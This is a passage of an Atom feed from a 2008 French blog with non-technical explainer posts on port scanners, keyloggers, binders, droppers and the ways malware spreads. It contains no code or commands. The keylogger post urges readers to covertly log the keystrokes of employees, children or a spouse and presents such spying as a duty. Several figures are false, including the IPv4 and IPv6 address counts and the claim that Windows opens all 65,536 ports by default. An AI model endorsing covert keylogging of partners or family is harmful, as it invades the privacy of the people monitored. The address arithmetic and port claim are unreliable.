style="font-size:180%;color:#ff0000;"&gt;&lt;strong&gt;Scanners de ports&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Les scanners de ports (et les scanners d'IPs) sont des outils logiciels automatiques (des robots) analysant les ports ouverts derrière une adresse IP (un ordinateur) afin d'y déceler une vulnérabilité exploitable. Les scanners de ports peuvent donc être utilisés par des administrateurs de réseaux pour surveiller et durcir les réseaux dont ils ont la charge grâce à des outils d'analyse comme les logiciels Nessus ou NMap. Ces mêmes outils scanners de ports se trouvent également entre les mains de pirates. Pour eux, la recherche de ports ouverts puis de ressources vulnérables derrière un port, est conduite afin d'exploiter la vulnérabilité, pénétrer la machine et en exploiter enfin les ressources.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;En termes d'insécurité, les scanners de ports ne conduisent pas une attaque en eux-mêmes, ils la précèdent.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#993399;"&gt;Fonctionnement d'un scanner de ports :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Dans son principe général, le fonctionnement est simple : un scanners de ports va scanner (tester, interroger) un intervalle de ports ou un dictionnaire de ports sur chaque machine dans un intervalle d'adresses IPs (scanner d'IPs). Par exemple : recherche de ports ouverts entre les ports 35000 et 35100 sur l'intervalle d'adresses IPs 128.208.78.000 à 128.208.78.255&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;65.536 ports par machines et 274.941.996.890.625 adresses IP possibles.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Les ports de communications des ordinateurs sont nombreux (Windows laisse ses 65.536 ports ouverts par défaut !)&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Les adresses IPs (adresse de votre ordinateur sur le réseau) vont, dans la norme IPV4, de 000.000.000.000 à 255.255.255.255 soit 2554, c'est à dire 4.228.250.625 adresses et donc autant de machines possibles connectées - ceci sur la base d'un adressage dit "IPV4" qui fut mis en place à l'origine en pensant qu'avec plus de 4 milliards d'adresses on pourrait "tenir" l'adressage longtemps. L'adressage se fait maintenant sur une base dite "IPV6" soit 2556, c'est à dire 274.941.996.890.625 adresses possibles ce qui devrait nous laisser le temps de voir venir.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;La ressource accessible recherchée est, le plus souvent, la partie "serveur" d'un &lt;span style="color:#000099;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-rat.html" target="_blank"&gt;RAT (Remote Administration Tool)&lt;/a&gt;&lt;/span&gt; - &lt;span style="color:#000099;"&gt;&lt;span style="color:#000000;"&gt;(&lt;/span&gt;&lt;span style="color:#cc0000;"&gt;appelé abusivement&lt;/span&gt; &lt;/span&gt;&lt;span style="color:#000000;"&gt;"&lt;/span&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-trojan.html" target="_blank"&gt;Trojans&lt;/a&gt;") qui va permettre de prendre le controle d'un ordinateur à distance.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#993399;"&gt;Dans la chronologie des faits :&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;La partie "serveur" d'un &lt;span style="color:#000099;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-rat.html" target="_blank"&gt;RAT (Remote Administration Tool) &lt;/a&gt;&lt;/span&gt;est lachée dans la nature, au même titre qu'un virus, pour qu'elle infecte le plus grand nombre d'ordinateurs possible. Toutes les méthodes sont "bonnes" pour le déployer :&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Faux fichiers (fake) sur les réseaux de P2P&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Fichiers infectés sur les réseaux de P2P&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Typiquement, les &lt;span style="color:#990000;"&gt;générateurs de clé (keygen)&lt;/span&gt; pour débloquer des copies pirates de logiciels (ces "serveurs" sont scannés par des organismes de type "détectives privés" identifiant et poursuivant les utilisateurs de copies pirates)&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Les "économiseurs d'écran" sont d'excellents vecteurs de &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-trojan.html" target="_blank"&gt;Trojans&lt;/a&gt; et sont, quasiment tous, des &lt;span style="color:#000099;"&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-backdoor.html" target="_blank"&gt;backdoors&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Fichiers piégés sur les sites de download&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Procédures piégées que l'on doit télécharger pour, par exemple, pouvoir jouer en réseau (de très nombreux sites de jeux on-line sont, ainsi, des vecteurs de trojans)&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#000099;"&gt;&lt;span style="color:#990000;"&gt;Contrôles ActiveX agressifs&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/script.html" target="_blank"&gt;Scripts&lt;/a&gt;&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Etc. ...&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Un scanner est utilisé pour trouver des "serveurs" qui "répondent" sur les machines des victimes potentielles. Le scanner peut chercher plusieurs "serveurs" de plusieurs &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-rat.html" target="_blank"&gt;RAT&lt;/a&gt; pour augmenter ses chances de trouver quelque chose d'exploitable. L'attaquant dit au scanner quels sont les &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-rat.html" target="_blank"&gt;RAT&lt;/a&gt; qu'il utilise. On remarquera que l'attaquant peut "tomber" sur un "serveur" qui se trouve tout à fait légitimement chez la victime, lorsqu'il s'agit, par exemple, d'une entreprise dont le service informatique est situé, géographiquement, ailleurs, ou dont l'informatique est sous-traitée auprès d'un prestataire de service, et qui permet ainsi à ses informaticiens d'intervenir à distance. Il existe des dizaines de logiciels de télémaintenance / télédiagnostic commerciaux - le plus célèbre, que l'on trouve sur les rayons de tous les magasins, étant probablement "PC-Anywhere" de Norton / Symantec.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;La partie "client" du &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-rat.html" target="_blank"&gt;RAT&lt;/a&gt; est utilisée, sur la machine de l'attaquant pour prendre le contrôle de la machine de la victime. Accessoirement, si l'attaquant ne tombe pas sur "son" trojan avec "son" mot de passe, il va chercher à forcer le serveur trouvé chez la victime potentielle pour établir le dialogue, à partir de listes de mots de passe (et les hackers s'échangent des listes de mots de passe), de dictionnaires de mots de passe, de "force brute" etc. ...&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Une fois dans la place, le pirate fait ce qu'il veut, silencieusement. Regarder ce que fait la victime, copier ses fichiers, modifier ses fichiers parfois, cacher sur l'ordinateur de la victime des documents ou outils compromettants pour l'attaquant, &lt;span style="color:#990000;"&gt;utiliser ses ressources, sa bande passante&lt;/span&gt; etc. ... On observera qu'en principe le pirate ne se fait pas remarquer, ce n'est pas son intérêt du tout. Il n'y a donc pas de destruction de fichiers et autres attaques visibles comme "tuer les processus", "rebooter la machine" (mais certains pirates, les débutants, tombent, au début, dans ces travers et se font remettre rapidement en place par leurs ainés car, au début, il faut se rapprocher de groupes "d'entraide" entre pirates et demander des conseils aux "confirmés" et, en sus, si on se fait voir de la victime elle ne va pas mettre longtemps à réagir et éradiquer le "serveur" sur sa machine).&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-8652915618244891934?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/8652915618244891934/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/scanners-de-ports.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/8652915618244891934'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/8652915618244891934'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/scanners-de-ports.html' title='Scanners de ports'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-2440526790204381728</id><published>2008-11-03T11:39:00.000-08:00</published><updated>2009-03-06T08:00:58.993-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Le Keylogger'/><title type='text'>Le Keylogger</title><content type='html'>&lt;strong&gt;&lt;span style="font-size:180%;color:#ff0000;"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:180%;color:#ff0000;"&gt;Keyloggers&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Programmes espions de surveillance, invisibles, notant la moindre activité sur un ordinateur dont toutes les frappes de touches au clavier.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#3366ff;"&gt;Voudriez-vous savoir qui travaille sur votre PC et qu'est-ce qu'il y fait lorsque vous êtes absent ?&lt;br /&gt;&lt;/span&gt;&lt;span style="color:#cc33cc;"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#cc33cc;"&gt;Voudriez-vous savoir ce que vos employés sont en train de faire au travail ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#3366ff;"&gt;Voudriez-vous savoir ce que fait vos enfants, avec qui ils parlent, l'objet de leur discussions sur internet?&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#cc33cc;"&gt;Voudriez-vous savoir si votre époux (épouse) entretiend des liaisons secrètes sur Internet ?&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#3366ff;"&gt;Vous êtes un espion ou un détective privé ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;&lt;em&gt;Si vous vous posez ces questions vous avez besoin d'un keylogger !&lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#000099;"&gt;Keyloggers logiciel&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Les Keyloggers sont des programmes, commerciaux ou non, d'espionnage. Ils peuvent être installés silencieusement et être actifs de manière totalement furtive sur votre poste de travail. Ils effectuent une surveillance invisible et totale, en arrière-plan, en notant dans des fichiers cachés et compressés le moindre détail de votre activité sur un ordinateur dont toutes les touches frappées au clavier, d'où leur nom de "key-logger". Ils sont aussi capables de faire un film de tout ce qui se passe à l'écran, en continu ou par capture d'écran à intervalles réguliers... Ils notent quels programmes sont utilisés et pendant combien de temps, les URL visitées, les e-mails lus ou envoyés, les conversations de toutes natures... dès la mise sous tension de la machine. Ils permettent, par la même occasion, de lire les champs habituellement cachés comme les mots de passe, les codes secrets etc. ... Enfin ils rendent compte, en temps réel ou en temps différé, sur place ou à distance. Il s'agit donc d'une agression particulièrement grave qui pose plusieurs problèmes :&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#cc33cc;"&gt;&lt;em&gt;La faille de sécurité qui à permis à quelqu'un de faire pénétrer cette malveillance.&lt;br /&gt;Le keylogger en lui-même qu'il convient d'éradiquer.&lt;br /&gt;Les mots de passe probablement révélés et autres données.&lt;br /&gt;A qui le crime à profite ? &lt;/em&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;D'un autre côté, si mon employé tente d'accéder à des documents qu'il n'a pas à connaître ou s'il tente d'effectuer des opérations qu'il n'a pas à effectuer, si mon conjoint lit mon courrier perso, si mes enfants prétendent ne pas surfer sur tels ou tels sites alors que ma facture de téléphone prouve qu'un dialer m'assassine... Tout cela aussi constitue des agressions et je suis en devoir, si ce n'est en droit, de me protéger en enquêtant grâce aux keyloggers.&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-2440526790204381728?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/2440526790204381728/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-keylogger.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/2440526790204381728'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/2440526790204381728'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-keylogger.html' title='Le Keylogger'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-7321065780165205381</id><published>2008-11-03T11:13:00.000-08:00</published><updated>2009-03-06T08:16:05.339-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Binder'/><title type='text'>Le Binder</title><content type='html'>&lt;span style="font-size:180%;color:#ff0000;"&gt;&lt;strong&gt;Binder -&lt;/strong&gt; &lt;em&gt;Les lieurs de merdes&lt;/em&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#000099;"&gt;Binder&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Programmes liants plusieurs programmes en un seul. En ce qui concerne l'insécurité informatique un binder sert à dissimuler dans un programme anodin et convoité un ou plusieurs parasites afin de leur faire pénétrer un système.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#993399;"&gt;Deux types de Binders :&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Programmes permettant d'accoler, de lier, un parasite à un programme que vous cherchez à télécharger. Vous recevez un tout qui est un exécutable constitué de 3 parties, le binder, le parasite et le programme convoité. Tous les types de parasites peuvent utiliser cette technique pour se diffuser, le programme convoité agissant alors en &lt;/strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/cheval-de-troie-trojan.html" target="_blank"&gt;&lt;strong&gt;cheval de Troie (Trojan)&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;, volontairement ou involontairement (typique de la diffusion des &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/adwares.html" target="_blank"&gt;adwares&lt;/a&gt;&lt;/strong&gt;&lt;strong&gt;, &lt;/strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/spyware.html" target="_blank"&gt;&lt;strong&gt;spywares&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;,&lt;/strong&gt; &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-keylogger.html" target="_blank"&gt;&lt;strong&gt;Keyloggers&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;, &lt;/strong&gt;&lt;strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-rat.html" target="_blank"&gt;RATs&lt;/a&gt; et &lt;/strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-backdoor.html" target="_blank"&gt;&lt;strong&gt;Backdoors&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;). Le binder, qui va être exécuté lorsque vous cherchez à installer le programme convoité, est un lanceur délieur. Il va délier (libérer) le programme convoité et lancer son installeur et il va installer le (ou les) parasites. Ceci peut s'appliquer aussi à des fichiers images, des vidéos, des sons etc. ...&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;On remarquera qu'il y a une faille de sécurité (un manque de vigilance) car la taille du document (programme...) téléchargé n'est pas égale à la taille annoncée par son éditeur. Ceci aurait du être vérifié avant le téléchargement (par un système de clés...).&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;&lt;span style="font-size:130%;"&gt;Un exemple :&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Programmes assez proches des éditeurs de liens (linker - link edit) utilisés dans la phase de post compilation d'un programme pour lier et résoudre les liens des bibliothèques externes. Dans ce cas le Binder va regrouper en un seul programme plusieurs petits bouts d'une malveillance qui a été découpée pour pénétrer un système sans être identifiée ni même remarquée (utilisation faible de la bande passante etc. ...).&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#993399;"&gt;Il y a 3 problèmes :&lt;/span&gt;&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Une faille de sécurité a permis le passage du binder et des morceaux de la malveillance&lt;br /&gt;Le Binder&lt;br /&gt;La Malveillance&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-7321065780165205381?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/7321065780165205381/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-binder.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/7321065780165205381'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/7321065780165205381'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-binder.html' title='Le Binder'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-4766993599230135670</id><published>2008-11-03T10:35:00.000-08:00</published><updated>2009-03-06T08:33:58.730-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Le Dropper'/><title type='text'>Le Dropper</title><content type='html'>&lt;span style="font-size:180%;color:#000099;"&gt;&lt;strong&gt;Dropper&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Parasite chargé d'introduire, décompresser et installer un autre parasite.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Forme minimaliste de &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/cheval-de-troie-trojan.html" target="_blank"&gt;Trojans&lt;/a&gt; juste chargée d'introduire, décompresser et installer une malveillance. Forme typique de l'installation d'un virus. Peut même s'autodétruire une fois sa tâche accomplie. Il existe une quantité incroyable de droppers, plusieurs milliers probablement, chacun étant une déclinaison de quelques matrices de droppers.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Le problème est triple :&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Le fait que le dropper soit présent sur une machine signifie qu'elle a été pénétrée. Il y a donc une faille de sécurité à chercher.&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;Le dropper en lui-même qui est une malveillance à éradiquer&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;La ou les malveillances qu'il a pu installer. Il convient de scanner intégralement la machine ou le réseau&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8741137099428742325-4766993599230135670?l=le-savoir-est-une-arme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://le-savoir-est-une-arme.blogspot.com/feeds/4766993599230135670/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-dropper.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4766993599230135670'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8741137099428742325/posts/default/4766993599230135670'/><link rel='alternate' type='text/html' href='http://le-savoir-est-une-arme.blogspot.com/2008/11/le-dropper.html' title='Le Dropper'/><author><name>Le PHENIX</name><uri>http://www.blogger.com/profile/10082371022971256171</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_myG8IURVG2Y/SaRLJczhNII/AAAAAAAAAAM/lXISYq93EHw/S220/PhenixTV.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8741137099428742325.post-4295940522548330394</id><published>2008-11-03T10:14:00.000-08:00</published><updated>2009-03-06T08:52:31.979-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Méthodes de diffusion d&apos;un parasite'/><title type='text'>Méthodes de diffusion d'un parasite</title><content type='html'>&lt;strong&gt;&lt;span style="color:#000099;"&gt;&lt;span style="font-size:180%;"&gt;Méthodes de diffusion du parasite&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Accès physique à l'ordinateur :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Le plus simple reste, tout de même, d'accéder physiquement à la machine (vous-même, votre copain, votre copine, un employé, un technicien de surface, un détective privé, un parent, un enfant, un ami, le service de gardiennage, la maintenance technique etc. ...) et d'y installer le parasite. Ce n'est probablement pas le cas pour les &lt;/strong&gt;&lt;strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/adwares.html" target="_blank"&gt;adwares&lt;/a&gt; mais ça l'est pour les&lt;/strong&gt; &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-keylogger.html" target="_blank"&gt;&lt;strong&gt;Keyloggers&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;, les&lt;/strong&gt; &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-backdoor.html" target="_blank"&gt;&lt;strong&gt;Backdoors&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;, les &lt;/strong&gt;&lt;strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-rat.html" target="_blank"&gt;Remote Admin Tools&lt;/a&gt; etc. ... La personne qui accède à l'ordinateur peut même en être son utilisateur normal qui a été manipulé et installe tout à fait inconsciemment le parasite après avoir été convaincue qu'elle faisait tout à fait autre chose en installant cette disquette, ce CD, etc. ... Il faut considérer cela comme une faille de sécurité (la première faille de sécurité, la plus importante, se trouve souvent &lt;em&gt;&lt;span style="color:#993399;"&gt;entre la chaise et le clavier&lt;/span&gt;&lt;/em&gt;).&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Abus de faiblesse :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Un bon discours, un bon texte ou une démonstration trompeuse vous a convaincu qu'un truc était absolument indispensable et que vous ne pouviez pas vivre sans. C'est ainsi que bon nombre de parasites sont installés alors que vous croyez installez, vous-même, une simple &lt;/strong&gt;&lt;strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/toolbar.html" target="_blank"&gt;barre d'outils (ToolsBar)&lt;/a&gt; dont vous êtes persuadé avoir besoin. De nombreux &lt;/strong&gt;&lt;strong&gt;utilitaires de sécurités crapuleux, dont plusieurs embarquent, en sus, des parasites (agissent en &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-trojan.html" target="_blank"&gt;Trojan&lt;/a&gt;&lt;/strong&gt;&lt;strong&gt;) utilisent cette technique d'ingénierie sociale. Là aussi le problème est souvent &lt;/strong&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#993399;"&gt;entre la chaise et le clavier&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt;&lt;strong&gt;.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;color:#ff0000;"&gt;Usage d'un trojan :&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;L'usage du &lt;/strong&gt;&lt;strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/cheval-de-troie-trojan.html" target="_blank"&gt;Cheval de Troie ou Trojan&lt;/a&gt; pour installer un parasite est la méthode la plus répandue et c'est vous-même qui êtes allé chercher le vecteur (probablement un programme "gratuit" ou "freeware" ou "shareware") de l'infection et avez procédé à son rapatriement (téléchargé ou copié depuis un CD-ROM etc. ...) et à son installation. Par exemple, c'est vous-même qui installez &lt;/strong&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;KaZaA&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt; sur votre ordinateur : &lt;/strong&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;KaZaA&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt; ne vient pas tout seul s'installer. Mais &lt;/strong&gt;&lt;strong&gt;&lt;span style="color:#993399;"&gt;KaZaA&lt;/span&gt;&lt;/strong&gt;&lt;strong&gt; est le vecteur de très nombreux parasites dont un &lt;/strong&gt;&lt;strong&gt;&lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/downloader.html" target="_blank"&gt;downloader&lt;/a&gt; permettant d'installer encore d'autres parasites dans un système pyramidal. C'est un &lt;a href="http://le-savoir-est-une-arme.blogspot.com/2008/11/le-trojan.html" target="_blank"&gt;Trojan&lt;/a&gt;&lt;/strong&gt;&lt;strong&gt;. Cette nécessité d'installer le trojan pour que soient installées les parasites contenus est importante car elle dénote bien qu'un trojan doit être installé pour pouvoir 